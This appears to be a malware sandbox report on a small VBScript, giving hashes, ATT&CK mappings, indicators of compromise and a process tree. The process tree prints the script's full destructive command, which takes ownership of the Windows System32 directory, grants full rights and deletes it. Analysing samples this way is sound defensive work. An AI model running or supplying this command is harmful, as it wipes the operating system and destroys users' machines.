dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533

General

Target

target.vbs
Size

209B
MD5

fe505a5e05c25e1b991d6f6094899bdf
SHA1

3dda3dbed85f227a9563b8b7e94b1fbfc9ec5d99
SHA256

dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533
SHA512

c7c39c1ddcb6c4a83489b14c459f0446bd1585bf4d840e7026a08b4341584ee48381b23a182f3f7fc74c04568a6428b00ffadab5954dbd6e3f2967b805c5340f

Score

8^/10

discovery exploit

Malware Config

Signatures

Manipulates Digital Signatures 1 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\System32\wintrust.dll cmd.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

2824 takeown.exe
2516 icacls.exe
Loads dropped DLL 7 IoCs

Processes:

WMIADAP.EXE

pid process

2536 WMIADAP.EXE
2536 WMIADAP.EXE
2536 WMIADAP.EXE
2536 WMIADAP.EXE
1196
1196
1196
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

2824 takeown.exe
2516 icacls.exe

description	ioc	process
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe

pid	process
2824	takeown.exe
2516	icacls.exe

pid	process
2536	WMIADAP.EXE
2536	WMIADAP.EXE
2536	WMIADAP.EXE
2536	WMIADAP.EXE
1196
1196
1196

pid	process
2824	takeown.exe
2516	icacls.exe

Drops file in System32 directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\comdlg32.dll	cmd.exe
File opened for modification	C:\Windows\System32\FXSAPI.dll	cmd.exe
File opened for modification	C:\Windows\System32\mfplat.dll	cmd.exe
File opened for modification	C:\Windows\System32\shlwapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\imagehlp.dll	cmd.exe
File opened for modification	C:\Windows\System32\sxs.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MICROS~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\cscapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\normaliz.dll	cmd.exe
File opened for modification	C:\Windows\System32\wbem\wbemprox.dll	cmd.exe
File opened for modification	C:\Windows\System32\usp10.dll	cmd.exe
File opened for modification	C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll	cmd.exe
File opened for modification	C:\Windows\System32\FWPUCLNT.DLL	cmd.exe
File opened for modification	C:\Windows\System32\syncui.dll	cmd.exe
File opened for modification	C:\Windows\System32\usbmon.dll	cmd.exe
File opened for modification	C:\Windows\System32\webservices.dll	cmd.exe
File opened for modification	C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll	cmd.exe
File opened for modification	C:\Windows\System32\cfgmgr32.dll	cmd.exe
File opened for modification	C:\Windows\System32\C_949.NLS	cmd.exe
File opened for modification	C:\Windows\System32\en-US\bthprops.cpl.mui	cmd.exe
File opened for modification	C:\Windows\System32\gdi32.dll	cmd.exe
File opened for modification	C:\Windows\System32\7B296F~2.C74	cmd.exe
File opened for modification	C:\Windows\System32\config\SECURI~2.LOG	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MICROS~4.EVT	cmd.exe
File opened for modification	C:\Windows\System32\wininit.exe	cmd.exe
File opened for modification	C:\Windows\System32\fveapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\netapi32.dll	cmd.exe
File opened for modification	C:\Windows\System32\tbs.dll	cmd.exe
File opened for modification	C:\Windows\System32\inetpp.dll	cmd.exe
File opened for modification	C:\Windows\System32\nsi.dll	cmd.exe
File opened for modification	C:\Windows\System32\wbem\NCProv.dll	cmd.exe
File opened for modification	C:\Windows\System32\bitsperf.dll	cmd.exe
File opened for modification	C:\Windows\System32\config\TxR\{01688~2.REG	cmd.exe
File opened for modification	C:\Windows\System32\gameux.dll	cmd.exe
File opened for modification	C:\Windows\System32\framedynos.dll	cmd.exe
File opened for modification	C:\Windows\System32\netutils.dll	cmd.exe
File opened for modification	C:\Windows\System32\sfc_os.dll	cmd.exe
File opened for modification	C:\Windows\System32\Syncreg.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MI7771~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\batmeter.dll	cmd.exe
File opened for modification	C:\Windows\System32\snmpapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\TSpkg.dll	cmd.exe
File opened for modification	C:\Windows\System32\esent.dll	cmd.exe
File opened for modification	C:\Windows\System32\netman.dll	cmd.exe
File opened for modification	C:\Windows\System32\imapi2.dll	cmd.exe
File opened for modification	C:\Windows\System32\wbem\repdrvfs.dll	cmd.exe
File opened for modification	C:\Windows\System32\WindowsCodecs.dll	cmd.exe
File opened for modification	C:\Windows\System32\ubpm.dll	cmd.exe
File opened for modification	C:\Windows\System32\config\RegBack\SAM	cmd.exe
File opened for modification	C:\Windows\System32\msxml6r.dll	cmd.exe
File opened for modification	C:\Windows\System32\netjoin.dll	cmd.exe
File opened for modification	C:\Windows\System32\psapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\xmllite.dll	cmd.exe
File opened for modification	C:\Windows\System32\oleacc.dll	cmd.exe
File opened for modification	C:\Windows\System32\pcwum.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MIA934~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\mprapi.dll	cmd.exe
File opened for modification	C:\Windows\System32\winevt\Logs\MI03A7~1.EVT	cmd.exe
File opened for modification	C:\Windows\System32\BFE.DLL	cmd.exe
File opened for modification	C:\Windows\System32\bitsigd.dll	cmd.exe
File opened for modification	C:\Windows\System32\thumbcache.dll	cmd.exe
File opened for modification	C:\Windows\System32\secur32.dll	cmd.exe
File opened for modification	C:\Windows\System32\UIAnimation.dll	cmd.exe
File opened for modification	C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

takeown.exe

description pid process

Token: SeTakeOwnershipPrivilege 2824 takeown.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	2824	takeown.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.execmd.exe

description	pid	process	target process
PID 1320 wrote to memory of 2412	1320	WScript.exe	cmd.exe
PID 1320 wrote to memory of 2412	1320	WScript.exe	cmd.exe
PID 1320 wrote to memory of 2412	1320	WScript.exe	cmd.exe
PID 2412 wrote to memory of 2824	2412	cmd.exe	takeown.exe
PID 2412 wrote to memory of 2824	2412	cmd.exe	takeown.exe
PID 2412 wrote to memory of 2824	2412	cmd.exe	takeown.exe
PID 2412 wrote to memory of 2516	2412	cmd.exe	icacls.exe
PID 2412 wrote to memory of 2516	2412	cmd.exe	icacls.exe
PID 2412 wrote to memory of 2516	2412	cmd.exe	icacls.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32
2⤵
- Manipulates Digital Signatures
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32 /r /d y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2824

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant administrators:F /t
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2516

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2284

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T
1⤵
- Loads dropped DLL
PID:2536

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

\Windows\System32\advapi32.dll
Filesize
856KB

MD5
6df46d2bd74e3da1b45f08f10d172732

SHA1
3491f8f9a73c00b158e43a530210d67a4f0598ae

SHA256
2dc945f6f2c4a82189bc7da2fcbb7d9a0e2588a909539249e55ba82468e0c677

SHA512
648d07a7bec83f45629d34defde0421f449998f3a290cca2ff3941ef2f551ce508c204cb2e0ba02c6b79dfcf7a7c2f2ac3056f286ca63d31e033db7c524f9abb

Download Submit
\Windows\System32\clbcatq.dll
Filesize
593KB

MD5
25983de69b57142039ac8d95e71cd9c9

SHA1
01691e3b0bfa569e64bdb7dc3d637a867ed2dc08

SHA256
a677da7ebcbcb6073d27e8a38809f51e971e83ed379bc599aaad6ef4216348da

SHA512
dfd22fb0570e3c1caf908305f04aec9c7cbe8332f6d6409b8c724baca523354c93bc240bf6d7944c892a4fc221c099d5fbf0b9526a9d9bb7c13ba367e876afec

Download Submit
\Windows\System32\cryptbase.dll
Filesize
43KB

MD5
784fa3df338e2e8f5f0389d6fac428af

SHA1
6d32c67c91c6d374854e907c6719db2538540867

SHA256
9c8aa0cfdeb9e38aaf8eb08626070e0f0364f4f8a793cfe3532ec6c007980c34

SHA512
a147e689c6fcca7bab690aec17deef74d6935338cd159bcb10acc2ad76841e6abbd9290ac17e2f5b5ec3422823a1e716e7cd5c5a1b950937c5295e14b68ac53c

Download Submit
\Windows\System32\cryptsp.dll
Filesize
78KB

MD5
d0c2fbb6d97416b0166478fc7ae2b212

SHA1
e290bdf2312ac30a4e9f2a96d7c84714eee84899

SHA256
7eab6c37f0a845e645ca44cc060ac6c56e386c7ef7a64716c6786c9602ad8c9d

SHA512
ee3cc1a1b21a0ee16532dfc0713f1b369414f521937e44851ba338eaf188109779b9b615ce37bf4cff572a9484d99d9a36184b9120cf4990fc2d2791ed680e87

Download Submit
\Windows\System32\imageres.dll
Filesize
19.3MB

MD5
5aa945234e9d4cce4f715276b9aa712c

SHA1
dba3c8cecb3f8d4b1d96265d8519dbe0e911f446

SHA256
65165bd131056816f009d987fc78ac86ffe0c3c38a27e73f873586b7ff4d59cf

SHA512
acf0d5706662b3f4abb68b94aad9155c17dc74ccf3a92ed97c9bc2abdf4f8fd32705bb7692836452304301605561121b4ef2b82b81563f9bf2a9d1c71e8c6233

Download Submit
\Windows\System32\wscript.exe
Filesize
165KB

MD5
8886e0697b0a93c521f99099ef643450

SHA1
851bd390bf559e702b8323062dbeb251d9f2f6f7

SHA256
d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f

SHA512
fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837

Download Submit

Analysis

Sharing